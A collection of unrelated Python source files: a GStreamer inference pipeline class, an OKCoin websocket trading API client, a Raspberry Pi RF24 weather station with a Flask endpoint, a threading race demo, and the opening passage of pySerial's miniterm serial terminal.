status_obj["avg_pipeline_latency"] = self.sum_pipeline_latency / \
self.count_pipeline_latency
return status_obj
def get_avg_fps(self):
return self.avg_fps
def _get_element_property(self, element, key):
if isinstance(element, str):
return (element, key, None)
if isinstance(element, dict):
return (element["name"], element["property"], element.get("format", None))
return None
def _set_bus_messages_flag(self):
request_parameters, config_parameters = Pipeline.get_section_and_config(
self.request, self.config, ["parameters"],
["parameters", "properties"])
bus_msgs = "bus-messages"
if bus_msgs in config_parameters and bus_msgs in request_parameters and \
isinstance(request_parameters[bus_msgs], bool):
self._bus_messages = request_parameters[bus_msgs]
def _set_section_properties(self, request_section, config_section):
# TODO: refactor
# pylint: disable=R1702
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "element" in config[key]:
if key in request:
if isinstance(config[key]["element"], list):
element_properties = [self._get_element_property(
x, key) for x in config[key]["element"]]
else:
element_properties = [self._get_element_property(
config[key]["element"], key)]
for element_name, property_name, format_type in element_properties:
element = self.pipeline.get_by_name(element_name)
if element:
if (property_name in [x.name for x in element.list_properties()]):
if (format_type == "json"):
element.set_property(
property_name, json.dumps(request[key]))
else:
element.set_property(
property_name, request[key])
logger.debug("Setting element: {}, property: {}, value: {}".format(
element_name,
property_name,
element.get_property(property_name)))
else:
logger.debug("Parameter {} given for element {}"
" but no property found".format(
property_name, element_name))
else:
logger.debug(
"Parameter {} given for element {}"
" but no element found".format(property_name, element_name))
def _cache_inference_elements(self):
model_instance_id = "model-instance-id"
gva_elements = [(element, element.__gtype__.name + '_'
+ element.get_property(model_instance_id))
for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES
and model_instance_id in [x.name for x in element.list_properties()]
and element.get_property(model_instance_id))]
for element, key in gva_elements:
if key not in GStreamerPipeline._inference_element_cache:
GStreamerPipeline._inference_element_cache[key] = element
def _set_default_models(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES and
"VA_DEVICE_DEFAULT" in element.get_property("model"))]
for element in gva_elements:
network = self.model_manager.get_default_network_for_device(
element.get_property("device"), element.get_property("model"))
logger.debug("Setting model to {} for element {}".format(
network, element.get_name()))
element.set_property("model", network)
@staticmethod
def _get_elements_by_type(pipeline, type_strings):
return [element for element in pipeline.iterate_elements()
if element.__gtype__.name in type_strings]
@staticmethod
def validate_config(config):
template = config["template"]
pipeline = Gst.parse_launch(template)
appsink_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSink"])
metaconvert = pipeline.get_by_name("metaconvert")
metapublish = pipeline.get_by_name("destination")
appsrc_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSrc"])
if (len(appsrc_elements) > 1):
logger.warning("Multiple appsrc elements found")
if len(appsink_elements) != 1:
logger.warning("Missing or multiple appsink elements")
if metaconvert is None:
logger.warning("Missing metaconvert element")
if metapublish is None:
logger.warning("Missing metapublish element")
def calculate_times(self, sample):
buffer = sample.get_buffer()
segment = sample.get_segment()
times = {}
times['segment.time'] = segment.time
times['stream_time'] = segment.to_stream_time(
Gst.Format.TIME, buffer.pts)
return times
def format_location_callback(self,
unused_element,
                                 unused_fragment_id,
sample,
unused_data=None):
times = self.calculate_times(sample)
if (self._real_base is None):
clock = Gst.SystemClock(clock_type=Gst.ClockType.REALTIME)
self._real_base = clock.get_time()
self._stream_base = times["segment.time"]
metaconvert = self.pipeline.get_by_name("metaconvert")
if metaconvert:
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
metaconvert.set_property(
"tags", json.dumps(self.request["tags"]))
adjusted_time = self._real_base + \
(times["stream_time"] - self._stream_base)
self._year_base = time.strftime(
"%Y", time.localtime(adjusted_time / 1000000000))
self._month_base = time.strftime(
"%m", time.localtime(adjusted_time / 1000000000))
self._day_base = time.strftime(
"%d", time.localtime(adjusted_time / 1000000000))
template = "{prefix}/{yearbase}/{monthbase}/{daybase}"
self._dir_name = template.format(prefix=self.request["parameters"]["recording_prefix"],
yearbase=self._year_base,
monthbase=self._month_base, daybase=self._day_base)
try:
os.makedirs(self._dir_name)
except FileExistsError:
logger.debug("Directory already exists")
template = "{dirname}/{adjustedtime}_{time}.mp4"
return template.format(dirname=self._dir_name,
adjustedtime=adjusted_time,
time=times["stream_time"] - self._stream_base)
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination"],
["destination", "properties"])
if "destination" in self.request and "type" in self.request["destination"]:
self._set_section_properties(["destination"],
["destination",
self.request["destination"]["type"], "properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_any_source(self):
src = self.pipeline.get_by_name("source")
if (not src):
for src in self.pipeline.iterate_sources():
break
return src
def start(self):
self.request["models"] = self.models
self._gst_launch_string = string.Formatter().vformat(
self.template, [], self.request)
with(self._create_delete_lock):
if (self.start_time is not None):
return
logger.debug("Starting Pipeline {id}".format(id=self.identifier))
logger.debug(self._gst_launch_string)
try:
self.pipeline = Gst.parse_launch(self._gst_launch_string)
self._set_properties()
self._set_bus_messages_flag()
self._set_default_models()
self._cache_inference_elements()
src = self._get_any_source()
sink = self.pipeline.get_by_name("appsink")
if (not sink):
sink = self.pipeline.get_by_name("sink")
if src and sink:
src_pad = src.get_static_pad("src")
if (src_pad):
src_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
else:
src.connect(
"pad-added", GStreamerPipeline.source_pad_added_callback, self)
sink_pad = sink.get_static_pad("sink")
sink_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.appsink_probe_callback, self)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
self._bus_connection_id = bus.connect("message", self.bus_call)
splitmuxsink = self.pipeline.get_by_name("splitmuxsink")
self._real_base = None
                if splitmuxsink is not None:
splitmuxsink.connect("format-location-full",
self.format_location_callback,
None)
self._set_application_source()
self._set_application_destination()
self.pipeline.set_state(Gst.State.PLAYING)
self.start_time = time.time()
except Exception as error:
logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
# Context is already within _create_delete_lock
self._delete_pipeline(Pipeline.State.ERROR)
def _set_application_destination(self):
self._app_destination = None
self.appsink_element = None
app_sink_elements = GStreamerPipeline._get_elements_by_type(self.pipeline, ["GstAppSink"])
if (app_sink_elements):
self.appsink_element = app_sink_elements[0]
if "destination" in self.request and self.request["destination"]["type"] == "application":
self._app_destination = AppDestination.create_app_destination(self.request, self)
if ((not self._app_destination) or (not self.appsink_element)
or (not self.appsink_element.name == "destination")):
raise Exception("Unsupported Application Destination: {}".format(
self.request["destination"]["class"]))
if self.appsink_element is not None:
self.appsink_element.set_property("emit-signals", True)
self.appsink_element.set_property('sync', False)
self.avg_fps = 0
if (self._app_destination):
self.appsink_element.connect("new-sample", self.on_sample_app_destination)
else:
self.appsink_element.connect("new-sample", self.on_sample)
def on_need_data_app_source(self, src, _):
try:
self._app_source.start_frames()
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def on_enough_data_app_source(self, src):
try:
self._app_source.pause_frames()
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def _set_application_source(self):
self._app_source = None
self.appsrc_element = None
if self.request["source"]["type"] == "application":
appsrc_element = self.pipeline.get_by_name("source")
if (appsrc_element) and (appsrc_element.__gtype__.name == "GstAppSrc"):
self.appsrc_element = appsrc_element
self._app_source = AppSource.create_app_source(self.request, self)
if (not self._app_source) or (not self.appsrc_element):
raise Exception("Unsupported Application Source: {}".format(
self.request["source"]["class"]))
self.appsrc_element.set_property("format", Gst.Format.TIME)
self.appsrc_element.set_property("block", True)
self.appsrc_element.set_property("do-timestamp", True)
self.appsrc_element.set_property("is-live", True)
self.appsrc_element.set_property("emit-signals", True)
self.appsrc_element.connect('need-data', self.on_need_data_app_source)
self.appsrc_element.connect('enough-data', self.on_enough_data_app_source)
@staticmethod
def source_pad_added_callback(unused_element, pad, self):
pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
return Gst.FlowReturn.OK
@staticmethod
def source_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
self.latency_times[pts] = time.time()
return Gst.PadProbeReturn.OK
@staticmethod
def appsink_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
source_time = self.latency_times.pop(pts, -1)
if source_time != -1:
self.sum_pipeline_latency += time.time() - source_time
self.count_pipeline_latency += 1
return Gst.PadProbeReturn.OK
def on_sample_app_destination(self, sink):
logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
result = Gst.FlowReturn.OK
try:
self._app_destination.process_frame(sample)
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Destination: {err}".format(
id=self.identifier, err=error))
result = Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return result
def on_sample(self, sink):
logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
buf = sample.get_buffer()
for meta in GVAJSONMeta.iterate(buf):
json_object = json.loads(meta.get_message())
logger.debug(json.dumps(json_object))
except Exception as error:
logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def bus_call(self, unused_bus, message, unused_data=None):
message_type = message.type
if message_type == Gst.MessageType.APPLICATION:
logger.info("Pipeline {id} Aborted".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if message_type == Gst.MessageType.EOS:
logger.info("Pipeline {id} Ended".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.COMPLETED)
elif message_type == Gst.MessageType.ERROR:
err, debug = message.parse_error()
logger.error(
"Error on Pipeline {id}: {err}: {debug}".format(id=self.identifier,
err=err,
debug=debug))
self._delete_pipeline_with_lock(Pipeline.State.ERROR)
elif message_type == Gst.MessageType.STATE_CHANGED:
old_state, new_state, unused_pending_state = message.parse_state_changed()
if message.src == self.pipeline:
if old_state == Gst.State.PAUSED and new_state == Gst.State.PLAYING:
if self.state is Pipeline.State.ABORTED:
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if self.state is Pipeline.State.QUEUED:
logger.info(
"Setting Pipeline {id} State to RUNNING".format(id=self.identifier))
self.state = Pipeline.State.RUNNING
else:
if self._bus_messages:
structure = Gst.Message.get_structure(message)
if structure:
logger.info("Message header: {name} , Message: {message}".format(
name=Gst.Structure.get_name(structure),
message=Gst.Structure.to_string(structure)))
return True
|
vnokcoin.py
|
# encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
# OKCoin websocket servers
OKCOIN_CNY = 'wss://real.okcoin.cn:10440/websocket/okcoinapi'
OKCOIN_USD = 'wss://real.okcoin.com:10440/websocket/okcoinapi'
# Account currency codes
CURRENCY_CNY = 'cny'
CURRENCY_USD = 'usd'
# Cryptocurrency symbol codes
SYMBOL_BTC = 'btc'
SYMBOL_LTC = 'ltc'
SYMBOL_ETH = 'eth'
# Market depth levels
DEPTH_20 = 20
DEPTH_60 = 60
# K-line (candlestick) intervals
INTERVAL_1M = '1min'
INTERVAL_3M = '3min'
INTERVAL_5M = '5min'
INTERVAL_15M = '15min'
INTERVAL_30M = '30min'
INTERVAL_1H = '1hour'
INTERVAL_2H = '2hour'
INTERVAL_4H = '4hour'
INTERVAL_6H = '6hour'
INTERVAL_1D = 'day'
INTERVAL_3D = '3day'
INTERVAL_1W = 'week'
# Trading symbol prefixes; append the currency code to complete them (e.g. 'btc_' + 'cny' -> 'btc_cny')
TRADING_SYMBOL_BTC = 'btc_'
TRADING_SYMBOL_LTC = 'ltc_'
TRADING_SYMBOL_ETH = 'eth_'
# Order types
TYPE_BUY = 'buy'
TYPE_SELL = 'sell'
TYPE_BUY_MARKET = 'buy_market'
TYPE_SELL_MARKET = 'sell_market'
# Futures contract expiry types
FUTURE_EXPIRY_THIS_WEEK = 'this_week'
FUTURE_EXPIRY_NEXT_WEEK = 'next_week'
FUTURE_EXPIRY_QUARTER = 'quarter'
# Futures order types
FUTURE_TYPE_LONG = 1
FUTURE_TYPE_SHORT = 2
FUTURE_TYPE_SELL = 3
FUTURE_TYPE_COVER = 4
# Whether a futures order uses the current (market) price
FUTURE_ORDER_MARKET = 1
FUTURE_ORDER_LIMIT = 0
# Futures leverage
FUTURE_LEVERAGE_10 = 10
FUTURE_LEVERAGE_20 = 20
# Order status codes
ORDER_STATUS_NOTTRADED = 0
ORDER_STATUS_PARTTRADED = 1
ORDER_STATUS_ALLTRADED = 2
ORDER_STATUS_CANCELLED = -1
ORDER_STATUS_CANCELLING = 4
########################################################################
class OkCoinApi(object):
"""基于Websocket的API对象"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
        self.apiKey = ''        # API key (user name)
        self.secretKey = ''     # secret key (password)
        self.host = ''          # server address
        self.currency = ''      # currency type (usd or cny)
        self.ws = None          # websocket application object
        self.thread = None      # worker thread
#######################
    ## Common helpers
#######################
#----------------------------------------------------------------------
def readData(self, evt):
"""解压缩推送收到的数据"""
# 创建解压器
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
# 将原始数据解压成字符串
inflated = decompress.decompress(evt) + decompress.flush()
# 通过json解析字符串
data = json.loads(inflated)
return data
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
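    # Illustrative example (added for clarity; not part of the original API):
    # for params = {'api_key': 'K', 'symbol': 'btc_cny'} and a secretKey of 'S',
    # the string that gets hashed is 'api_key=K&symbol=btc_cny&secret_key=S' and
    # the signature is its upper-case MD5 hex digest.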
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
print 'onMessage'
data = self.readData(evt)
print data
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
print 'onError'
print evt
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
print 'onClose'
#----------------------------------------------------------------------
def onOpen(self, ws):
"""接口打开"""
print 'onOpen'
#----------------------------------------------------------------------
def connect(self, host, apiKey, secretKey, trace=False):
"""连接服务器"""
self.host = host
self.apiKey = apiKey
self.secretKey = secretKey
if self.host == OKCOIN_CNY:
self.currency = CURRENCY_CNY
else:
self.currency = CURRENCY_USD
websocket.enableTrace(trace)
self.ws = websocket.WebSocketApp(host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
#----------------------------------------------------------------------
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
#----------------------------------------------------------------------
def sendMarketDataRequest(self, channel):
"""发送行情请求"""
# 生成请求
d = {}
d['event'] = 'addChannel'
d['binary'] = True
d['channel'] = channel
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def sendTradingRequest(self, channel, params):
"""发送交易请求"""
# 在参数字典中加上api_key和签名字段
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'addChannel'
d['binary'] = True
d['channel'] = channel
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#######################
    ## Spot trading
#######################
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货普通报价"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_ticker' %(self.currency, symbol))
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth):
"""订阅现货深度报价"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_depth_%s' %(self.currency, symbol, depth))
#----------------------------------------------------------------------
def subscribeSpotTradeData(self, symbol):
"""订阅现货成交记录"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_trades' %(self.currency, symbol))
#----------------------------------------------------------------------
def subscribeSpotKline(self, symbol, interval):
"""订阅现货K线"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_kline_%s' %(self.currency, symbol, interval))
#----------------------------------------------------------------------
def spotTrade(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot%s_trade' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
channel = 'ok_spot%s_cancel_order' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
channel = 'ok_spot%s_orderinfo' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def subscribeSpotTrades(self):
"""订阅现货成交信息"""
channel = 'ok_sub_spot%s_trades' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeSpotUserInfo(self):
"""订阅现货账户信息"""
channel = 'ok_sub_spot%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#######################
    ## Futures trading
#######################
#----------------------------------------------------------------------
def subscribeFutureTicker(self, symbol, expiry):
"""订阅期货普通报价"""
self.sendMarketDataRequest('ok_sub_future%s_%s_ticker_%s' %(self.currency, symbol, expiry))
#----------------------------------------------------------------------
def subscribeFutureDepth(self, symbol, expiry, depth):
"""订阅期货深度报价"""
self.sendMarketDataRequest('ok_sub_future%s_%s_depth_%s_%s' %(self.currency, symbol,
expiry, depth))
#----------------------------------------------------------------------
def subscribeFutureTradeData(self, symbol, expiry):
"""订阅期货成交记录"""
self.sendMarketDataRequest('ok_sub_future%s_%s_trade_%s' %(self.currency, symbol, expiry))
#----------------------------------------------------------------------
def subscribeFutureKline(self, symbol, expiry, interval):
"""订阅期货K线"""
self.sendMarketDataRequest('ok_sub_future%s_%s_kline_%s_%s' %(self.currency, symbol,
expiry, interval))
#----------------------------------------------------------------------
def subscribeFutureIndex(self, symbol):
"""订阅期货指数"""
self.sendMarketDataRequest('ok_sub_future%s_%s_index' %(self.currency, symbol))
#----------------------------------------------------------------------
def futureTrade(self, symbol, expiry, type_, price, amount, order, leverage):
"""期货委托"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
params['contract_type'] = str(expiry)
params['match_price'] = str(order)
params['lever_rate'] = str(leverage)
channel = 'ok_future%s_trade' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futureCancelOrder(self, symbol, expiry, orderid):
"""期货撤单"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
params['contract_type'] = str(expiry)
channel = 'ok_future%s_cancel_order' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futureUserInfo(self):
"""查询期货账户"""
channel = 'ok_future%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def futureOrderInfo(self, symbol, expiry, orderid, status, page, length):
"""查询期货委托信息"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
params['contract_type'] = expiry
params['status'] = status
params['current_page'] = page
params['page_length'] = length
channel = 'ok_future%s_orderinfo' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def subscribeFutureTrades(self):
"""订阅期货成交信息"""
channel = 'ok_sub_future%s_trades' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFutureUserInfo(self):
"""订阅期货账户信息"""
channel = 'ok_sub_future%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturePositions(self):
"""订阅期货持仓信息"""
channel = 'ok_sub_future%s_positions' %(self.currency)
self.sendTradingRequest(channel, {})
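# Illustrative usage sketch (commented out; not part of the original module).
# The endpoint constants and method names are the ones defined above; the key
# values are placeholders.
#
#   api = OkCoinApi()
#   api.connect(OKCOIN_CNY, 'your_api_key', 'your_secret_key', trace=False)
#   sleep(1)                             # give the websocket time to open
#   api.subscribeSpotTicker(SYMBOL_BTC)  # public market data channel
#   api.spotUserInfo()                   # signed account query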
|
weather_base_station.py
|
#! /usr/bin/env python3
import time
import sqlite3
import RPi.GPIO as GPIO
import threading
from flask import Flask, request, jsonify
from flask_cors import CORS
from datetime import datetime
from struct import *
from RF24 import *
from RF24Network import *
def create_database():
conn = sqlite3.connect("weather.db")
cursor = conn.cursor()
cursor.execute(
"""CREATE TABLE IF NOT EXISTS weather(
id INTEGER PRIMARY KEY AUTOINCREMENT,
date TIMESTAMP,
station INTEGER,
temp REAL,
humi REAL,
alti REAL,
pres REAL
)""")
conn.close()
def insert_weather_data(conn, params):
cursor = conn.cursor()
sqlite_insert_with_param = """INSERT INTO weather
(date, station, temp, humi, alti, pres) VALUES (?, ?, ?, ?, ?, ?)"""
cursor.execute(sqlite_insert_with_param, params)
conn.commit()
def start_radio_capture():
radio = RF24(22,0)
network = RF24Network(radio)
conn = sqlite3.connect("weather.db")
octlit = lambda n:int(n, 8)
# Address of our node in Octal format (01, 021, etc)
this_node = octlit("00")
# Address of the other node
other_node = octlit("01")
radio.begin()
radio.setDataRate(RF24_250KBPS)
time.sleep(0.1)
network.begin(120, this_node) # channel 120
radio.printDetails()
while 1:
network.update()
while network.available():
header, payload = network.read(16)
temp, humi, pres, alti = unpack('<ffff', bytes(payload))
data_tuple = (datetime.now(), header.from_node, temp, humi, alti, pres)
            insert_weather_data(conn, data_tuple)
print(f'[{data_tuple[0]}] (Station: {data_tuple[1]}, Temp: {temp:.2f}, Humi: {humi:.2f}, Pres: {pres:.2f}, Alti: {alti:.2f})')
time.sleep(5)
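# Illustrative sketch (not part of the original station code): the sensor node
# is expected to send four little-endian floats, matching unpack('<ffff', ...)
# above. This shows the corresponding packing side of that 16-byte payload.
def example_sensor_payload(temp, humi, pres, alti):
    return pack('<ffff', temp, humi, pres, alti)  # 16 bytes, read via network.read(16)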
if __name__ == "__main__":
create_database()
radioThread = threading.Thread(target=start_radio_capture)
radioThread.start()
time.sleep(1)
app = Flask(__name__)
CORS(app)
#app.config["DEBUG"] = True
@app.route("/weather", methods=["GET"])
    def get_weather_data():
if 'station' in request.args:
station = int(request.args["station"])
else:
return jsonify({"error": "The station variable must be passed on the request"})
if 'limit' in request.args:
limit = int(request.args["limit"])
else:
limit = 1
weather_select_query = """SELECT * FROM weather WHERE station = ? ORDER BY date DESC LIMIT ?"""
conn = sqlite3.connect("weather.db")
results = []
cursor = conn.cursor()
cursor.execute(weather_select_query, (station, limit,))
records = cursor.fetchall()
for row in records:
result = {
"id":row[0],
"date": row[1],
"station": row[2],
"temp": row[3],
"humi": row[4],
"alti": row[5],
"pres": row[6]}
results.append(result)
cursor.close()
return jsonify(results)
app.run(host="0.0.0.0", port=5000)
|
thread-add-random.py
|
"prints different results on different runs on Windows 7"
import threading, time
count = 0
def adder():
global count
count = count + 1 # update a shared name in global scope
time.sleep(0.5) # threads share object memory and global names
count = count + 1
threads = []
for i in range(100):
thread = threading.Thread(target=adder, args=())
thread.start()
threads.append(thread)
for thread in threads: thread.join()
print(count)
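# A minimal sketch of a fix (added for illustration; not part of the original
# example): guarding both updates with a Lock makes each read-modify-write
# atomic. Swapping target=adder for target=adder_locked above would make the
# final print(count) deterministic (always 200 for 100 threads).
lock = threading.Lock()
def adder_locked():
    global count
    with lock:                  # only one thread at a time updates count
        count = count + 1
    time.sleep(0.5)
    with lock:
        count = count + 1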
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):    # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
